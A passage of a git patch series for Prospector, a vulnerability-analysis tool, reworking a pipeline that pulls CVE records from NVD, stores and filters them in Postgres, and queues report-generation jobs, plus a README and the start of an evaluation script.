CVE entries from NVD + nvd_url = "https://services.nvd.nist.gov/rest/json/cves/2.0?" + + nvd_url += f"lastModStartDate={start_date}&lastModEndDate={end_date}" + + async with aiohttp.ClientSession() as session: + try: + async with session.get(nvd_url) as response: + if response.status == 200: + data = await response.json() + console.print( + "CVE data retrieved", + status=MessageStatus.OK, + ) + else: + print("Error while trying to retrieve entries") + except aiohttp.ClientError as e: + print(str(e)) + logger.error( + "Error while retrieving vulnerabilities from NVD", + exc_info=True, + ) + console.print( + "Error while retrieving vulnerabilities from NVD", + status=MessageStatus.OK, + ) - data = "" - # Set up the URL to retrieve the latest CVE entries from NVD - nvd_url = "https://services.nvd.nist.gov/rest/json/cves/2.0?" + return data - nvd_url += f"lastModStartDate={start_date}&lastModEndDate={end_date}" - async with aiohttp.ClientSession() as session: - try: - async with session.get(nvd_url) as response: - if response.status == 200: - data = await response.json() - else: - print("Error while trying to retrieve entries") - except aiohttp.ClientError as e: - print(str(e)) - logger.error( - "Error while retrieving vulnerabilities from NVD", exc_info=True - ) - - return data +def save_cves_to_db(raw_data_from_nvd): + """Saves raw CVE data from NVD to the database.""" + with ConsoleWriter("Saving raw CVE data to database") as console: + db = connect_to_db() + for record in raw_data_from_nvd["vulnerabilities"]: + vuln_id = record["cve"]["id"] + pub_date = record["cve"]["published"] + mod_date = record["cve"]["lastModified"] + raw_record = json.dumps(record) + source = "NVD" + url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={vuln_id}" -def save_cves_to_db(vulns): - db = connect_to_db() - for vuln in vulns["vulnerabilities"]: - vuln_id = vuln["cve"]["id"] - pub_date = vuln["cve"]["published"] - mod_date = vuln["cve"]["lastModified"] - raw_record = json.dumps(vuln) - source = "NVD" - url = ( - f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={vuln_id}" + res = db.lookup_vuln_id(vuln_id, mod_date) + if res[0] == 0: + db.save_vuln( + vuln_id, pub_date, mod_date, raw_record, source, url + ) + logger.info( + f"Saved {[record['cve']['id'] for record in raw_data_from_nvd['vulnerabilities']]} in database.", ) - - res = db.lookup_vuln_id(vuln_id, mod_date) - if res[0] == 0: - print(f"Saving vuln: {vuln_id} in database") - db.save_vuln(vuln_id, pub_date, mod_date, raw_record, source, url) - db.disconnect() + console.print( + f"Saved {len(raw_data_from_nvd['vulnerabilities'])} records in database." + ) + db.disconnect() async def get_cve_by_id(id): @@ -154,27 +173,35 @@ def get_time_range(d_time): async def process_cve_data(): - # start_date,end_date=get_time_range(d_time) - db = connect_to_db() - - # Retrieve unprocessed entries from the vulnerability table - unprocessed_vulns = db.get_unprocessed_vulns() - - # Process each entry - processed_vulns = [] - for unprocessed_vuln in unprocessed_vulns: - entry_id = unprocessed_vuln[0] - raw_record = unprocessed_vuln[1] - - processed_vuln = await map_entry(raw_record) - if processed_vuln is not None: - processed_vulns.append(processed_vuln) - db.save_processed_vuln( - entry_id, - processed_vuln["repo_url"], - processed_vuln["version_interval"], - ) - db.disconnect() + """Takes the vulnerabilities from the raw data table and processes them.""" + with ConsoleWriter("Processing raw CVE data") as console: + # start_date,end_date=get_time_range(d_time) + db = connect_to_db() + + # Retrieve unprocessed entries from the vulnerability table + unprocessed_vulns = db.get_unprocessed_vulns() + + # Process each entry + processed_vulns = [] + for unprocessed_vuln in unprocessed_vulns: + entry_id = unprocessed_vuln[0] + raw_record = unprocessed_vuln[1] + + processed_vuln = await map_entry(raw_record) + if processed_vuln is not None: + processed_vulns.append(processed_vuln) + db.save_processed_vuln( + entry_id, + processed_vuln["repo_url"], + processed_vuln["version_interval"], + ) + db.disconnect() + + console.print( + f"{len(processed_vulns)} left after processing.", + status=MessageStatus.OK, + ) + return processed_vulns diff --git a/prospector/pipeline/job_creation.py b/prospector/pipeline/job_creation.py index 75a4520f2..4d1db8fc0 100644 --- a/prospector/pipeline/job_creation.py +++ b/prospector/pipeline/job_creation.py @@ -9,7 +9,7 @@ from rq import Connection, Queue, get_current_job from backenddb.postgres import PostgresBackendDB -from cli.console import ConsoleWriter +from cli.console import ConsoleWriter, MessageStatus from core.prospector import prospector from core.report import generate_report from llm.llm_service import LLMService @@ -169,46 +169,52 @@ async def enqueue_jobs(reports_filepath: str, creator: str = "Auto"): creator (str): The creator of the jobs, eg. Auto """ - db = connect_to_db() - processed_cves = db.get_processed_vulns_not_in_job() + with ConsoleWriter("Enqueueing Jobs") as console: + db = connect_to_db() + processed_cves = db.get_processed_vulns_not_in_job() - print( - f"Enqueueing {len(processed_cves)} jobs for {[cve_entry['vuln_id'] for cve_entry in processed_cves]}" - ) - print(processed_cves) - - for processed_vuln in processed_cves: - pv_id = processed_vuln["_id"] - pv_repository = processed_vuln["repository"] - pv_versions = processed_vuln["versions"] - v_vuln_id = processed_vuln["vuln_id"] - - try: - job = create_prospector_job( - v_vuln_id, pv_repository, pv_versions, reports_filepath - ) - except Exception: - logger.error( - "Error when creating jobs for processed vulnerabilities", - exc_info=True, - ) - - try: - db.save_job( - job.get_id(), - pv_id, - job.args, - job.created_at, - job.started_at, - job.ended_at, - job.result, - creator, - job.get_status(refresh=True), - ) - except Exception: - logger.error( - "Error when saving the created job to the database.", - exc_info=True, - ) + console.print( + f"Enqueueing {len(processed_cves)} jobs for {[cve_entry['vuln_id'] for cve_entry in processed_cves]}", + status=MessageStatus.OK, + ) - db.disconnect() + for processed_vuln in processed_cves: + pv_id = processed_vuln["_id"] + pv_repository = processed_vuln["repository"] + pv_versions = processed_vuln["versions"] + v_vuln_id = processed_vuln["vuln_id"] + + try: + job = create_prospector_job( + v_vuln_id, pv_repository, pv_versions, reports_filepath + ) + except Exception: + logger.error( + "Error when creating jobs for processed vulnerabilities", + exc_info=True, + ) + + try: + db.save_job( + job.get_id(), + pv_id, + job.args, + job.created_at, + job.started_at, + job.ended_at, + job.result, + creator, + job.get_status(refresh=True), + ) + except Exception: + logger.error( + "Error when saving the created job to the database.", + exc_info=True, + ) + + db.disconnect() + + console.print( + f"\n\t\tEnqueueing finished", + status=MessageStatus.OK, + ) diff --git a/prospector/pipeline/main.py b/prospector/pipeline/main.py index 6aab0d9c7..b5e40d7a0 100644 --- a/prospector/pipeline/main.py +++ b/prospector/pipeline/main.py @@ -1,4 +1,5 @@ import asyncio +from cli.console import ConsoleWriter, MessageStatus from pipeline.filter_entries import ( get_cve_data, process_cve_data, @@ -7,7 +8,7 @@ from pipeline.job_creation import enqueue_jobs -DAYS_AGO = 10 # Time period from DAYS_AGO to now to retrieve CVEs from NVD +DAYS_AGO = 1 # Time period from DAYS_AGO to now to retrieve CVEs from NVD async def dispatch_jobs(): @@ -28,6 +29,7 @@ async def dispatch_jobs(): async def main(): """Starting point to enqueue jobs into the pipeline""" + ConsoleWriter.print(f"Starting pipeline\n", status=MessageStatus.OK) await dispatch_jobs() From a07ea30e25a43ef59a8503aaa145bb73e5e3078f Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 09:50:20 +0000 Subject: [PATCH 017/130] more adjustment after renaming to pipeline --- prospector/docker/worker/Dockerfile | 2 +- .../docker/worker/etc_supervisor_confd_rqworker.conf.j2 | 2 +- prospector/pipeline/filter_entries.py | 8 ++++---- prospector/pipeline/job_creation.py | 4 ++-- prospector/pipeline/version_extraction_test.py | 2 +- prospector/service/api/routers/endpoints.py | 6 +++--- prospector/service/api/routers/feeds.py | 4 ++-- prospector/service/main.py | 4 +++- 8 files changed, 17 insertions(+), 15 deletions(-) diff --git a/prospector/docker/worker/Dockerfile b/prospector/docker/worker/Dockerfile index fd3b9863f..df46335b3 100644 --- a/prospector/docker/worker/Dockerfile +++ b/prospector/docker/worker/Dockerfile @@ -69,7 +69,7 @@ COPY docker/worker/etc_supervisor_confd_rqworker.conf.j2 /etc/supervisor.d/rqwor #VOLUME ["/pythonimports"] #ENV PYTHONPATH "${PYTHONPATH}:/pythonimports" -VOLUME [ "/data_sources/reports" ] +VOLUME [ "/pipeline/reports" ] RUN chmod +x /usr/local/bin/start_rq_worker.sh #CMD tail -f /dev/null diff --git a/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 b/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 index 30375d14a..64e60b2ea 100644 --- a/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 +++ b/prospector/docker/worker/etc_supervisor_confd_rqworker.conf.j2 @@ -4,7 +4,7 @@ ; (possibly with minor modifications) [program:rqworker] -command=/usr/local/bin/python3 /usr/local/bin/rq worker {{env['RQ_QUEUE']}} -u redis://{{env['REDIS_HOST']}}:{{env['REDIS_PORT']}}/{{env['REDIS_DB']}} --logging_level {{env['LOG_LEVEL']}} --path /app/data_sources/nvd --path /app/service/api/routers +command=/usr/local/bin/python3 /usr/local/bin/rq worker {{env['RQ_QUEUE']}} -u redis://{{env['REDIS_HOST']}}:{{env['REDIS_PORT']}}/{{env['REDIS_DB']}} --logging_level {{env['LOG_LEVEL']}} --path /app/pipeline/nvd --path /app/service/api/routers process_name=%(program_name)s%(process_num)01d ; If you want to run more than one worker instance, increase this diff --git a/prospector/pipeline/filter_entries.py b/prospector/pipeline/filter_entries.py index 56b8c51d6..25a652806 100644 --- a/prospector/pipeline/filter_entries.py +++ b/prospector/pipeline/filter_entries.py @@ -67,7 +67,7 @@ async def get_cve_data(d_time): if response.status == 200: data = await response.json() console.print( - "CVE data retrieved", + "\n\tCVE data retrieved", status=MessageStatus.OK, ) else: @@ -79,7 +79,7 @@ async def get_cve_data(d_time): exc_info=True, ) console.print( - "Error while retrieving vulnerabilities from NVD", + "\n\tError while retrieving vulnerabilities from NVD", status=MessageStatus.OK, ) @@ -108,7 +108,7 @@ def save_cves_to_db(raw_data_from_nvd): f"Saved {[record['cve']['id'] for record in raw_data_from_nvd['vulnerabilities']]} in database.", ) console.print( - f"Saved {len(raw_data_from_nvd['vulnerabilities'])} records in database." + f"\n\tSaved {len(raw_data_from_nvd['vulnerabilities'])} records in database." ) db.disconnect() @@ -198,7 +198,7 @@ async def process_cve_data(): db.disconnect() console.print( - f"{len(processed_vulns)} left after processing.", + f"\n\t{len(processed_vulns)} left after processing.", status=MessageStatus.OK, ) diff --git a/prospector/pipeline/job_creation.py b/prospector/pipeline/job_creation.py index 4d1db8fc0..025a050ec 100644 --- a/prospector/pipeline/job_creation.py +++ b/prospector/pipeline/job_creation.py @@ -174,7 +174,7 @@ async def enqueue_jobs(reports_filepath: str, creator: str = "Auto"): processed_cves = db.get_processed_vulns_not_in_job() console.print( - f"Enqueueing {len(processed_cves)} jobs for {[cve_entry['vuln_id'] for cve_entry in processed_cves]}", + f"\n\tEnqueueing {len(processed_cves)} jobs for {[cve_entry['vuln_id'] for cve_entry in processed_cves]}", status=MessageStatus.OK, ) @@ -215,6 +215,6 @@ async def enqueue_jobs(reports_filepath: str, creator: str = "Auto"): db.disconnect() console.print( - f"\n\t\tEnqueueing finished", + f"\n\tEnqueueing finished", status=MessageStatus.OK, ) diff --git a/prospector/pipeline/version_extraction_test.py b/prospector/pipeline/version_extraction_test.py index 38124f67c..ab362a0a1 100644 --- a/prospector/pipeline/version_extraction_test.py +++ b/prospector/pipeline/version_extraction_test.py @@ -1,6 +1,6 @@ import pytest -from data_sources.nvd.versions_extraction import ( +from pipeline.versions_extraction import ( extract_version_range, extract_version_ranges_cpe, extract_version_ranges_description, diff --git a/prospector/service/api/routers/endpoints.py b/prospector/service/api/routers/endpoints.py index cabf275c2..452c3bfdd 100644 --- a/prospector/service/api/routers/endpoints.py +++ b/prospector/service/api/routers/endpoints.py @@ -60,7 +60,7 @@ async def get_report(job_id): # queue = Queue() # job = queue.fetch_job(job_id) # get and redirect to the html page of the generated report - report_path = f"/app/data_sources/reports/{job_id}.html" + report_path = f"/app/pipeline/reports/{job_id}.html" if os.path.exists(report_path): with open( report_path, @@ -90,9 +90,9 @@ async def get_settings(job_id, request: Request): @router.get("/report_page", response_class=HTMLResponse) async def report_page(request: Request): report_list = [] - for filename in os.listdir("/app/data_sources/reports"): + for filename in os.listdir("/app/pipeline/reports"): if filename.endswith(".html"): - file_path = os.path.join("/app/data_sources/reports", filename) + file_path = os.path.join("/app/pipeline/reports", filename) mtime = os.path.getmtime(file_path) mtime_dt = datetime.fromtimestamp(mtime) report_list.append((os.path.splitext(filename)[0], mtime_dt)) diff --git a/prospector/service/api/routers/feeds.py b/prospector/service/api/routers/feeds.py index e8c43238b..972c4b888 100644 --- a/prospector/service/api/routers/feeds.py +++ b/prospector/service/api/routers/feeds.py @@ -38,9 +38,9 @@ def connect_to_db(): @router.get("/reports") async def get_reports(request: Request): report_list = [] - for filename in os.listdir("/app/data_sources/reports"): + for filename in os.listdir("/app/pipeline/reports"): if filename.endswith(".html"): - file_path = os.path.join("/app/data_sources/reports", filename) + file_path = os.path.join("/app/pipeline/reports", filename) mtime = os.path.getmtime(file_path) mtime_dt = datetime.fromtimestamp(mtime) report_list.append((os.path.splitext(filename)[0], mtime_dt)) diff --git a/prospector/service/main.py b/prospector/service/main.py index e5760cf0d..40b6db13a 100644 --- a/prospector/service/main.py +++ b/prospector/service/main.py @@ -42,7 +42,9 @@ app.include_router(jobs.router) app.mount("/static", StaticFiles(directory="service/static"), name="static") -app.mount("/reports", StaticFiles(directory="./data_sources/reports"), name="reports") +app.mount( + "/reports", StaticFiles(directory="./pipeline/reports"), name="reports" +) # ----------------------------------------------------------------------------- From aa71baadba619d078944071270ecaaedcfec3ea3 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 14:07:36 +0000 Subject: [PATCH 018/130] updates and sorts gitignore --- .gitignore | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index 8d79fa9b0..75503a5f7 100644 --- a/.gitignore +++ b/.gitignore @@ -63,4 +63,5 @@ prospector/.idea/* prospector/*.html prospector/*.json prospector/evaluation -.DS_Store \ No newline at end of file +.DS_Store +prospector/pipeline/reports/* From f077121d807e141adcb12d6c0199b116074ed0fa Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 14:08:22 +0000 Subject: [PATCH 019/130] can successfully generate reports with the pipeline --- prospector/docker-compose.yml | 4 ++-- prospector/pipeline/filter_entries.py | 10 ++++++++-- prospector/pipeline/job_creation.py | 11 ++++++----- prospector/pipeline/main.py | 2 +- 4 files changed, 17 insertions(+), 10 deletions(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 123bdf5df..f1c6171e1 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -28,14 +28,14 @@ services: context: . dockerfile: docker/worker/Dockerfile volumes: - - ./app:/app + - ./:/app # - ./pipeline/reports:/app/pipeline/reports depends_on: - redis environment: LOG_LEVEL: debug PIP_REQUIREMENTS: requirements.txt - GIT_CACHE: /tmp + GIT_CACHE: /tmp/gitcache db: image: postgres diff --git a/prospector/pipeline/filter_entries.py b/prospector/pipeline/filter_entries.py index 25a652806..4703e7f8e 100644 --- a/prospector/pipeline/filter_entries.py +++ b/prospector/pipeline/filter_entries.py @@ -9,6 +9,7 @@ import requests from psycopg2.extensions import parse_dsn from psycopg2.extras import DictCursor, DictRow, Json +from tqdm import tqdm from backenddb.postgres import PostgresBackendDB from cli.console import ConsoleWriter, MessageStatus # noqa: E402 @@ -182,8 +183,13 @@ async def process_cve_data(): unprocessed_vulns = db.get_unprocessed_vulns() # Process each entry + pbar = tqdm( + unprocessed_vulns, + desc="Processing raw CVE data", + unit="CVE record", + ) processed_vulns = [] - for unprocessed_vuln in unprocessed_vulns: + for unprocessed_vuln in pbar: entry_id = unprocessed_vuln[0] raw_record = unprocessed_vuln[1] @@ -224,7 +230,7 @@ async def map_entry(vuln): "repo_url": data["git"], "version_interval": version, } - print(vuln["cve"]["id"]) + # print(vuln["cve"]["id"]) # Sanity Check return filtered_vuln return None diff --git a/prospector/pipeline/job_creation.py b/prospector/pipeline/job_creation.py index 025a050ec..07704c1ee 100644 --- a/prospector/pipeline/job_creation.py +++ b/prospector/pipeline/job_creation.py @@ -98,7 +98,7 @@ def _run_prospector( "backend_address": config.backend, "git_cache": config.git_cache, "limit_candidates": config.max_candidates, - "use_llm_repository_url": config.use_llm_repository_url, + "use_llm_repository_url": config.llm_service.use_llm_repository_url, "enabled_rules": config.enabled_rules, } @@ -114,10 +114,11 @@ def _run_prospector( results, advisory_record = prospector(**params) generate_report( - results, - advisory_record, - "html", - f"{report_filepath}{cve_id}_{job_id}", + results=results, + advisory_record=advisory_record, + report_type=config.report.format, + report_filename=f"{report_filepath}{cve_id}_{job_id}", + prospector_params=params, ) status = "finished" results = (f"{report_filepath}{cve_id}_{job_id}",) diff --git a/prospector/pipeline/main.py b/prospector/pipeline/main.py index b5e40d7a0..9f204f952 100644 --- a/prospector/pipeline/main.py +++ b/prospector/pipeline/main.py @@ -8,7 +8,7 @@ from pipeline.job_creation import enqueue_jobs -DAYS_AGO = 1 # Time period from DAYS_AGO to now to retrieve CVEs from NVD +DAYS_AGO = 5 # Time period from DAYS_AGO to now to retrieve CVEs from NVD async def dispatch_jobs(): From 04746d260e5c7452b633093f8171767a39ab2285 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 14:30:24 +0000 Subject: [PATCH 020/130] cleans up code --- prospector/pipeline/filter_entries.py | 62 ++++++++------------------- prospector/pipeline/job_creation.py | 3 -- 2 files changed, 17 insertions(+), 48 deletions(-) diff --git a/prospector/pipeline/filter_entries.py b/prospector/pipeline/filter_entries.py index 4703e7f8e..f12506278 100644 --- a/prospector/pipeline/filter_entries.py +++ b/prospector/pipeline/filter_entries.py @@ -20,10 +20,6 @@ config = parse_config_file() -# with open("./data/project_metadata.json", "r") as f: -# global match_list -# match_list = json.load(f) - def connect_to_db(): db = PostgresBackendDB( @@ -54,7 +50,7 @@ async def get_cve_data(d_time): """ with ConsoleWriter("Obtaining CVE data from NVD API") as console: - start_date, end_date = get_time_range(d_time) + start_date, end_date = _get_time_range(d_time) data = "" # Set up the URL to retrieve the latest CVE entries from NVD @@ -114,7 +110,8 @@ def save_cves_to_db(raw_data_from_nvd): db.disconnect() -async def get_cve_by_id(id): +async def get_cve_by_id(id: str): + """Obtains one CVE from the NVD database.""" nvd_url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={id}" async with aiohttp.ClientSession() as session: @@ -132,39 +129,9 @@ async def get_cve_by_id(id): return data -async def add_single_cve(vuln_id: str): - raw_json_cve = get_cve_by_id(vuln_id) - save_cves_to_db(raw_json_cve) - - -def write_list_to_file(lst, filename): - with open(filename, "w") as file: - for item in lst: - file.write(str(item) + "\n") - - -def csv_to_json(csv_file_path): - with open(csv_file_path, "r") as csv_file: - csv_reader = csv.reader(csv_file) - data = [] - # Skip the header row - next(csv_reader) - # Loop through the rows of the file - for row in csv_reader: - # Create a dictionary for the row data - row_data = { - "project": row[0], - "service_name": row[1], - "repository": row[2], - } - data.append(row_data) - # Convert to JSON object - json_data = json.dumps(data) - return json_data - - -def get_time_range(d_time): - # calculate the date to retrieve new entries (%Y-%m-%dT%H:%M:%S.%f%2B01:00) +def _get_time_range(d_time): + """Calculates the date to retrieve new entries + (%Y-%m-%dT%H:%M:%S.%f%2B01:00)""" date_now = datetime.datetime.now() start_date = (date_now - datetime.timedelta(days=d_time)).strftime( "%Y-%m-%dT%H:%M:%S" @@ -193,7 +160,7 @@ async def process_cve_data(): entry_id = unprocessed_vuln[0] raw_record = unprocessed_vuln[1] - processed_vuln = await map_entry(raw_record) + processed_vuln = await _filter_raw_cve_data(raw_record) if processed_vuln is not None: processed_vulns.append(processed_vuln) db.save_processed_vuln( @@ -211,22 +178,27 @@ async def process_cve_data(): return processed_vulns -async def map_entry(vuln): +async def _filter_raw_cve_data(raw_nvd_cve: str): + """Filters out CVEs that affect products listed in project_metadata.json""" # TODO: improve mapping technique async with aiofiles.open("./data/project_metadata.json", "r") as f: match_list = json.loads(await f.read()) - project_names = extract_products(vuln["cve"]["descriptions"][0]["value"]) - # print(project_names) + project_names = extract_products( + raw_nvd_cve["cve"]["descriptions"][0]["value"] + ) + # print(project_names) # Sanity Check + for project_name in project_names: for data in match_list.values(): keywords = [kw.lower() for kw in data["search keywords"]] if project_name.lower() in keywords: version = extract_version_range( - vuln["cve"], vuln["cve"]["descriptions"][0]["value"] + raw_nvd_cve["cve"], + raw_nvd_cve["cve"]["descriptions"][0]["value"], ) filtered_vuln = { - "nvd_info": vuln, + "nvd_info": raw_nvd_cve, "repo_url": data["git"], "version_interval": version, } diff --git a/prospector/pipeline/job_creation.py b/prospector/pipeline/job_creation.py index 07704c1ee..a67213269 100644 --- a/prospector/pipeline/job_creation.py +++ b/prospector/pipeline/job_creation.py @@ -1,6 +1,3 @@ -import json -import sys -import time from datetime import datetime from typing import Optional From 44c4d5bb805b192358091318262e9a48a542bcc3 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 29 Aug 2024 14:47:39 +0000 Subject: [PATCH 021/130] adds readme --- prospector/pipeline/README.md | 49 +++++++++++++++++++++++++++++ prospector/pipeline/job_creation.py | 2 +- prospector/pipeline/main.py | 4 +-- 3 files changed, 52 insertions(+), 3 deletions(-) create mode 100644 prospector/pipeline/README.md diff --git a/prospector/pipeline/README.md b/prospector/pipeline/README.md new file mode 100644 index 000000000..62875ba16 --- /dev/null +++ b/prospector/pipeline/README.md @@ -0,0 +1,49 @@ +# Pipeline Usage of Prospector + + +The pipeline works in the following way: + +1. `get_cve_data()` of `filter_entries.py` first fetches the most recent CVEs' raw data. +2. This raw data get saved to the `vulnerability` table of the database. +3. Then this raw vulnerability data gets fetched from the database and filtered (`process_cve_data()` of `filter_entries.py`) +4. For each filtered CVE, a job (essentially the Prospector function and the report generation function) is created and enqueued in the Redis Queue using `enqueue_jobs()` from `job_creation.py`. + +## Use the Pipeline + +For the pipeline to work, first run + +```bash +make docker-setup +``` + +to create the following five containers: + +```bash +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +77e4b01ada4d prospector_backend "python ./service/ma…" 58 minutes ago Up 58 minutes 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp prospector_backend_1 +57a30c903a9a prospector_worker "/usr/local/bin/star…" 58 minutes ago Up 58 minutes prospector_worker_1 +2ea00e47ac71 redis:alpine "docker-entrypoint.s…" 58 minutes ago Up 58 minutes 0.0.0.0:6379->6379/tcp, :::6379->6379/tcp prospector_redis_1 +120d3502ee51 postgres "docker-entrypoint.s…" 58 minutes ago Up 58 minutes 0.0.0.0:5432->5432/tcp, :::5432->5432/tcp db +1d9acef24637 adminer "entrypoint.sh php -…" 58 minutes ago Up 58 minutes 0.0.0.0:8080->8080/tcp, :::8080->8080/tcp prospector_adminer_1 +``` + +Then enqueue the latest CVEs as jobs by running `python3 pipeline/main.py`. + +### Increase the number of workers + +Adjust the number of workers in `etc_supervisor_confd_rqworker.conf.j2`: + +```bash +... +numprocs=2 +... +``` + +## Observe Pipeline + +View the database on `localhost:8080`. + +View the fetched vulnerabilities and generated reports on `localhost:8000`. + +View worker output in the terminal by running `docker attach prospector_worker_1` or the output in `prospector.log` (even though this can be difficult to read with more than 1 worker, because the logging gets all mixed up between workers). + diff --git a/prospector/pipeline/job_creation.py b/prospector/pipeline/job_creation.py index a67213269..79e6a4363 100644 --- a/prospector/pipeline/job_creation.py +++ b/prospector/pipeline/job_creation.py @@ -213,6 +213,6 @@ async def enqueue_jobs(reports_filepath: str, creator: str = "Auto"): db.disconnect() console.print( - f"\n\tEnqueueing finished", + "\n\tEnqueueing finished", status=MessageStatus.OK, ) diff --git a/prospector/pipeline/main.py b/prospector/pipeline/main.py index 9f204f952..03a629ed3 100644 --- a/prospector/pipeline/main.py +++ b/prospector/pipeline/main.py @@ -22,14 +22,14 @@ async def dispatch_jobs(): save_cves_to_db(cve_data) # get entry from db and process - processed_cves = await process_cve_data() + _ = await process_cve_data() await enqueue_jobs(reports_filepath="pipeline/reports/") async def main(): """Starting point to enqueue jobs into the pipeline""" - ConsoleWriter.print(f"Starting pipeline\n", status=MessageStatus.OK) + ConsoleWriter.print("Starting pipeline\n", status=MessageStatus.OK) await dispatch_jobs() From 95bbacce80f2abd06f9ee45670ae31e30823174d Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 08:44:21 +0000 Subject: [PATCH 022/130] adds LLM statistics to statistics object and Prospector reports Captures execution time at the level above the LLMService function, so that even if LLM function doesn't get executed anymore (because the information is found in db), the time of the db retrieval is still measured. --- prospector/rules/rules.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index eb1c6a78d..c9d0993de 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -461,6 +461,13 @@ def apply( candidate.diff, candidate.repository, candidate.message ) + update_response = requests.post( + backend_address + "/commits/", + json=[candidate.to_dict()], + headers={"content-type": "application/json"}, + ) + update_response.raise_for_status() + return candidate.security_relevant except requests.exceptions.RequestException as e: From a670bc85a2a1c3b6ec1f6595fd27ac8b20fec98e Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 08:44:21 +0000 Subject: [PATCH 023/130] adds LLM statistics to statistics object and Prospector reports --- prospector/llm/llm_service.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/prospector/llm/llm_service.py b/prospector/llm/llm_service.py index c88e81895..70b4bfdb0 100644 --- a/prospector/llm/llm_service.py +++ b/prospector/llm/llm_service.py @@ -10,9 +10,12 @@ from llm.prompts.classify_commit import zero_shot as cc_zero_shot from llm.prompts.get_repository_url import prompt_best_guess from log.logger import logger +from stats.execution import execution_statistics, measure_execution_time from util.config_parser import LLMServiceConfig from util.singleton import Singleton +llm_statistics = execution_statistics.sub_collection("LLM") + class LLMService(metaclass=Singleton): """A wrapper class for all functions requiring an LLM. This class is also a singleton, as only a @@ -81,6 +84,7 @@ def get_repository_url( return url + @measure_execution_time(execution_statistics.sub_collection("LLM")) def classify_commit( self, diff: str, repository_name: str, commit_message: str ) -> bool: From 5697bfe9aedf855335b1ef51502910fd33c39551 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 11 Jul 2024 15:14:49 +0000 Subject: [PATCH 024/130] adds matteo's script --- prospector/evaluation/run_multiple.py | 1046 +++++++++++++++++++++++++ 1 file changed, 1046 insertions(+) create mode 100644 prospector/evaluation/run_multiple.py diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py new file mode 100644 index 000000000..a4aa65cdc --- /dev/null +++ b/prospector/evaluation/run_multiple.py @@ -0,0 +1,1046 @@ +# flake8: noqa +import argparse +import csv +import json +import multiprocessing +import os +import re +import signal +import subprocess +import sys +import time +from collections import OrderedDict, defaultdict +from distutils.util import strtobool +from typing import Dict, List +from urllib.parse import urlparse + +import pandas as pd +import requests +import seaborn as sns +import spacy +from dateutil.parser import isoparse +from matplotlib import pyplot as plt +from tqdm import tqdm + +from core.prospector import prospector +from core.report import generate_report +from datamodel.advisory import build_advisory_record +from datamodel.nlp import extract_affected_filenames, get_names +from git.git import Git +from git.version_to_tag import get_possible_tags + + +def load_dataset(path: str): + with open(path, "r") as file: + reader = csv.reader(file, delimiter=";") + return [row for row in reader if "CVE" in row[0] and row[3] != "True"] + + +def is_missing(path: str): + return not os.path.exists(path) + + +def has_certainty(rules: List[Dict]): + if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): + return "COMMIT_IN_REFERENCE" + if any(rule["id"] == "CVE_ID_IN_MESSAGE" for rule in rules): + return "CVE_ID_IN_MESSAGE" + if any( + rule["id"] in ("CROSS_REFERENCED_JIRA_LINK", "CROSS_REFERENCED_GH_LINK") + for rule in rules + ): + return "CROSS_REFERENCE" + if any(rule["id"] == "CVE_ID_IN_LINKED_ISSUE" for rule in rules): + return "CVE_ID_IN_LINKED_ISSUE" + + return False + + +# def commit_distance_to_adv(dataset_path: str): +# dataset = load_dataset(dataset_path) +# for itm in dataset: + + +def get_full_commit_ids(dataset_path: str): + dataset = load_dataset("empirical_study/datasets/" + dataset_path + ".csv") + for itm in dataset: + repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") + commits = [] + for commit in itm[4].split(","): + commit_id = repository.find_commit(commit) + if commit_id is not None: + commits.append(commit_id) + + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(commits)};{itm[5]}") + + +def check_version_to_tag_matching(dataset_path: str): + dataset = load_dataset(dataset_path) + for itm in dataset: + repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") + tags = repository.get_tags() + + prev_version, next_version = itm[2].split(":") + prev_tag, next_tag = get_possible_tags(tags, itm[2]) + if prev_tag != "" and next_tag != "": + continue + + if prev_tag == "" and next_tag == "": + print( + f"{itm[0]}\n {prev_version}:{next_version}\n{tags}\n*****************\n" + ) + continue + if prev_tag == "": + print( + f"{itm[0]}\n {prev_version}:{next_tag}OK\n{tags}\n*****************\n" + ) + continue + if next_tag == "": + print( + f"{itm[0]}\n {prev_tag}OK:{next_version}\n{tags}\n*****************\n" + ) + continue + + # print(f"{itm[0]}\n{tags}\n") + # if prev_tag == "": + # print(f"{prev_version} -> {tags}") + + # if next_tag == "": + # print(f"{next_version} -> {tags}") + + +def get_reservation_date(cve_id: str): + # time.sleep(0.05) + url = f"https://cveawg.mitre.org/api/cve/{cve_id}" + response = requests.get(url) + if response.status_code == 200: + try: + date = response.json()["cveMetadata"]["dateReserved"] + return cve_id, int(isoparse(date).timestamp()) + except KeyError: + return None + + +def temp_load_reservation_dates(dataset_path: str): + with open(dataset_path, "r") as file: + reader = csv.reader(file, delimiter=";") + return {itm[0]: int(itm[1]) for itm in reader} + + +def analyze_results_rules(dataset_path: str): + 